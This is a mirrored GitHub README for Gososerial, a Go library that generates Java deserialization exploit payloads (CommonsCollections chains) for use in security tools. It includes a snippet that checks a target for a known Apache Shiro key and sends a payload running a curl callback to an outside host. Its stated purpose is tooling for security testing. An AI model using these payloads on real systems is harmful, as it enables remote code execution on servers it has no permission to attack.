Code Monkey home page Code Monkey logo

gososerial's Introduction

Gososerial

Introduce

  • Ysoserial is a well-known tool for Java deserialization security

  • No Java environment and no need to download ysoserial.jar file

  • Enter the command to directly obtain the payload, which is convenient for writing security tools

Quick Start

go get github.com/JimmyWA/Gososerial
package main

import gososerial "github.com/JimmyWA/gososerial"

func main()  {
	payload := gososerial.GetCC1("calc.exe")
	......
	sendPayload(payload)
	......
}

Shiro550 Scan Code

......
func TestFindShiro(t *testing.T) {
	target := "http://a.b.c.d:8080/"
	key := shiro.CheckShiroKey(target)
	if key != "" {
		log.Info("find key: %s", key)
	}
	payload := gososerial.GetCC5("curl xxxxx.ceye.io")
	shiro.SendPayload(key, payload, target)
}
......

Reference

4ra1n: https://github.com/4ra1n

ysoserial: https://github.com/frohoff/ysoserial

xray: https://github.com/chaitin/xray

phith0n: https://github.com/phith0n

Appendix

这个仓库的起因是4ra1n师傅的gososerial年久失修(?),于是在github找到了一个备份仓库,新建了一个自用,方便自己维护。该仓库目前只有CC1~CC7的利用链,在jboss环境中测试了CC5,其他还未测试。之后可能会根据需要继续添加其他利用链。

gososerial's People

Stargazers

Nyx2023 avatar avatar

Watchers

avatar

Forkers

nyx2022

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.